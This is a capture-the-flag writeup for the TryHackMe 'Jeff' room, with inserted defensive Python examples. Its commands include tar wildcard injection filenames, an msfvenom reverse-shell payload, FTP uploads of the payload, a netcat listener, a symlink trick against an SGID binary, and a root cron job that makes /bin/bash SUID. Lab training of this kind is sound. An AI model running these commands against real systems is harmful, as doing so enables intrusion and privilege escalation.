TryHackMe: Jeff — Writeup

Room difficulty: Hard
Topics: Web server enumeration, WordPress exploitation, working with vhosts, cracking encrypted zip files, Docker container breakout, PHP code analysis, and horizontal & vertical privilege escalation.

Photo by Mika Baumeister on Unsplash

Port scanning

I started with a simple nmap TCP port scan, and from the output we can see that there's nothing beyond the usual.

Only two ports are open: 22/tcp (running OpenSSH 7.6p1) and 80/tcp (running nginx). Command: nmap -sC -sV -T4 machine_ip -p-

Web server enumeration & vhost discovery

The webserver's main page appears to be completely empty, but viewing its source code, we see a hint.

So, let's add jeff.thm to the /etc/hosts file like so:

And now we can begin searching for valid subdomains and directories. To do so, gobuster fits our needs.

Running gobuster in vhost mode with a DNS wordlist from SecLists, we're able to find a valid subdomain: wordpress.jeff.thm. Don't forget to add it to your /etc/hosts file as well.

Running gobuster in dir mode with the medium directory wordlist from DirBuster, we're able to find 4 paths to follow: /uploads, /admin, /assets, /backups

There's nothing interesting at the jeff.thm main page: at /uploads there's an upload form that does absolutely nothing, /admin is blank, /assets gives us a 403 (Forbidden), leaving us with /backups, which is the right path to follow.
I ran gobuster in dir mode with the same wordlist, but updated the URL value to http://jeff.thm/backups and added an option to append extensions to each word. The extensions I added are common backup extensions like .tar, .zip, .rar, .7z and .bak. After a while, it found a valid backup file: http://jeff.thm/backups/backup.zip

Cracking encrypted backup zip file

We can download the backup file at /backups/backup.zip, but cannot unzip it because it’s encrypted.

We can use John the Ripper and its helper scripts to try to crack the file. As it's a zip file, we need to use zip2john.py to convert it to a format that john can understand and work with.

And we find a valid password for the zip file (REDACTED).

Unzipping the backup, we find a valid password for the WordPress user in wpadmin.bak

WordPress exploitation & initial shell

Using the previously found password, we're able to log in as "jeff" at wordpress.jeff.thm/wp-login.php

After trying for a while to get a reverse shell the usual ways, like editing a PHP file from the theme, the only way I could find to achieve it was uploading a malicious plugin. Links: Source // Download
Go to plugins > add new > upload plugin > select the zip file, install it and activate it.

We could exploit this manually, but there is a Metasploit module that does it for us automatically. Run msfconsole on your attacking machine and follow the steps below.

Remember to change LHOST value to YOUR TUN0 IP ADDRESS (ifconfig tun0)

Docker container breakout

Whoa, we received a reverse shell connection, but sadly we're in a Docker container. We can confirm that in many ways, but the most common is the presence of the file /.dockerenv.

We are the user 'www-data', the user that runs the webserver. Checking the /var/www/html folder, we find an interesting PHP file: /var/www/html/ftp_backup.php

The script uploads files to the FTP server on the host machine, and the host machine does something with these files. As it is a backup script, we can assume the host machine is compressing all files inside the directory to create a local backup. The correct path to follow is tar wildcard injection.

Exploitation process

1. Enumerating - FTP Server

[Victim machine]$ curl -s -v -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1'

2. Exploiting - Tar

[Victim machine]$ echo '' > '--checkpoint-action=exec=sh shell.sh'
[Victim machine]$ echo '' > '--checkpoint=1'

*These must be created inside a writable folder, like /dev/shm*

3. Exploiting - Shell generation

[Attacking machine]$ msfvenom -p cmd/unix/reverse_python lhost=YOUR-TUN0-IP lport=1234 R

Then copy the output and save it as 'shell.sh' on the victim machine, or use a Python webserver and wget to transfer the file.

4. Uploading to the FTP server and running a netcat listener

[Victim machine]$ curl -T '--checkpoint-action=exec=sh shell.sh' -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Victim machine]$ curl -T '--checkpoint=1' -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Victim machine]$ curl -T shell.sh -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Attacking machine]$ netcat -lvnp 1234
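The host's backup job is exploitable because a shell glob hands file names to tar as if they were command-line options. The following is an added example (not part of the writeup, and not the room's actual backup script): it flags option-like names in a constructed listing of the upload directory, shows the argv a `tar czf backup.tgz *` job would receive, and builds the hardened invocation that ends option parsing with `--` and anchors every name with `./`.

```python
"""Added example: why `tar czf backup.tgz *` is injectable and how to fix it."""
import re

# Anything starting with '-' is parsed by GNU tar as an option, not a file.
OPTION_LIKE = re.compile(r"^-")

# Constructed listing of the FTP upload directory after the steps above.
UPLOAD_DIR_LISTING = [
    "notes.txt",
    "shell.sh",
    "--checkpoint=1",
    "--checkpoint-action=exec=sh shell.sh",
]


def suspicious_names(names):
    """Entries that would become tar options if expanded by a shell glob."""
    return [n for n in names if OPTION_LIKE.match(n)]


def naive_argv(names, archive="backup.tgz"):
    """The argv tar receives from `tar czf backup.tgz *` (vulnerable form):
    the shell sorts the glob expansion and appends the raw names."""
    return ["tar", "czf", archive, *sorted(names)]


def safe_argv(names, archive="backup.tgz"):
    """Hardened form: `--` terminates option parsing and the `./` prefix
    makes every entry unambiguously a path, so `./--checkpoint=1` is a file."""
    return ["tar", "czf", archive, "--", *("./" + n for n in sorted(names))]


def injected_options(argv):
    """Return the arguments in the file-list position (after `tar`, the mode
    letters and the archive name) that GNU tar would still treat as options,
    i.e. dash-prefixed arguments appearing before a `--` terminator."""
    found = []
    for arg in argv[3:]:
        if arg == "--":
            break
        if arg.startswith("-"):
            found.append(arg)
    return found


if __name__ == "__main__":
    print("option-like names:", suspicious_names(UPLOAD_DIR_LISTING))
    print("naive argv injects:", injected_options(naive_argv(UPLOAD_DIR_LISTING)))
    print("safe argv injects:", injected_options(safe_argv(UPLOAD_DIR_LISTING)))
```

Running the audit over a real upload directory before each backup, and switching the job to the `--` form, removes the class of bug rather than just the two file names used here.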

Horizontal privilege escalation

There are two valid users with home directories on the machine: jeff and backupmgr (us). Searching for files owned by jeff, we find a binary and a backup file owned by jeff and readable only by him and the group 'pwman'.

We can transfer /opt/systools/systool to our machine and analyze it further with reverse engineering tools. As this appears to be a simple ELF executable, viewing the text inside it with the 'strings' tool shows us some interesting information.

This binary's permissions are peculiar: it has the SGID bit set, which means we can run it with the permissions of the 'pwman' group.

Exploitation

[Victim machine]$ cd /opt/systools
[Victim machine]$ rm message.txt
[Victim machine]$ ln -s /var/backups/jeff.bak message.txt
[Victim machine]$ ./systool
Choose your option: 2
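The symlink trick works because the SGID binary opens a file name inside a directory we can write to and follows whatever it points at. As an added example (not the room's systool, whose source is not on the page), here is how a privileged reader can refuse that redirection: open with O_NOFOLLOW, then check the opened descriptor with fstat instead of trusting the path. The `demo` function constructs a real message file and a symlink to a fake backup file in a temporary directory.

```python
"""Added example: reading message.txt without being redirected by a symlink."""
import os
import stat
import tempfile


def read_message(path, expected_uid=None):
    """Open `path` without following a final-component symlink, verify the
    opened object is a regular file (and owned by expected_uid if given),
    and return its text. Returns None when any check fails.
    Caveat: O_NOFOLLOW only covers the last path component; the directory
    itself must not be attacker-writable for this to be sufficient."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:            # ELOOP for a symlink, ENOENT, EACCES, ...
        return None
    try:
        st = os.fstat(fd)      # checks the descriptor, not a second lookup
        if not stat.S_ISREG(st.st_mode):
            return None
        if expected_uid is not None and st.st_uid != expected_uid:
            return None
        with os.fdopen(fd, "rb") as f:
            fd = -1            # fdopen now owns the descriptor
            return f.read().decode(errors="replace")
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Constructed scenario mirroring `ln -s /var/backups/jeff.bak message.txt`:
    returns (content of the real file, result for the symlinked name)."""
    with tempfile.TemporaryDirectory() as d:
        real = os.path.join(d, "message.txt")
        secret = os.path.join(d, "jeff.bak")         # stand-in, not real data
        link = os.path.join(d, "linked-message.txt")
        with open(real, "w") as f:
            f.write("hello from systool\n")
        with open(secret, "w") as f:
            f.write("PLACEHOLDER-NOT-A-REAL-PASSWORD\n")
        os.symlink(secret, link)
        return read_message(real), read_message(link)


if __name__ == "__main__":
    print(demo())
```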

Doing so, we're able to log in as jeff using his password by running su jeff
The user flag is not hashed and it needs to be. Run:
$ echo -n FLAG | md5sum

Vertical privilege escalation

As we have jeff's password, we can check whether he can run something as another user, like root, by running $ sudo -l

It seems jeff's shell has some restrictions and commands are returning errors. To solve this, we can use Python to spawn a proper TTY:

$ python -c 'import pty; pty.spawn("/bin/bash")'

There are many ways we can abuse crontab, but I chose to create a malicious python script inside /dev/shm, that will execute a system command (chmod +s /bin/bash), giving me the rights to run /bin/bash with root permissions.

It is a little bit unstable to use a text editor in this type of shell, so I used the cat <<EOF > file heredoc method to write the script instead. To edit the crontab, follow these steps:

$ sudo crontab -e
1. Scroll down to the bottom
2. Press: I
3. Paste this: * * * * * /usr/bin/python3 /dev/shm/script.py
4. Press: Esc, then : and type wq! to save and quit
5. Wait about 1 minute and run:
$ /bin/bash -p
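From the defender's side, the entry added above is easy to spot: a root cron job that executes a script living in a world-writable directory. The following added example (not part of the writeup) audits crontab text for that pattern, handling comments, variable assignments and @reboot-style schedules; the sample crontab is constructed for the demonstration.

```python
"""Added example: flag cron jobs that run commands from world-writable dirs."""
import re
import shlex

# Directories any local user can write to (constructed list for the audit).
WORLD_WRITABLE = ("/dev/shm", "/tmp", "/var/tmp")

# Five schedule fields followed by the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>.+)$")

# Constructed sample crontab in the shape `sudo crontab -l` would print.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
@reboot /usr/sbin/service nginx start
* * * * * /usr/bin/python3 /dev/shm/script.py
"""


def command_of(line):
    """Extract the command part of a crontab line, or None for non-jobs."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if "=" in stripped.split()[0]:       # VAR=value assignment line
        return None
    if stripped.startswith("@"):         # @reboot, @daily, ...
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    m = CRON_LINE.match(stripped)
    return m.group("cmd") if m else None


def in_world_writable(token):
    return any(token == d or token.startswith(d + "/") for d in WORLD_WRITABLE)


def risky_cron_entries(crontab_text):
    """Return (line, offending_path) for each job that references a path
    under a world-writable directory in its command."""
    findings = []
    for line in crontab_text.splitlines():
        cmd = command_of(line)
        if cmd is None:
            continue
        for tok in shlex.split(cmd):
            if in_world_writable(tok):
                findings.append((line.strip(), tok))
                break
    return findings
```

The same check applied to /etc/crontab and /etc/cron.d files (which carry an extra user field) needs the regex widened to six fields; the rest is unchanged.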

Conclusion

Very cool machine, which covered a bunch of interesting topics and took me a lot of time to complete, really testing my 'tryhard' mentality. I hope you enjoyed my explanation, and I really recommend you go check out this room on TryHackMe!
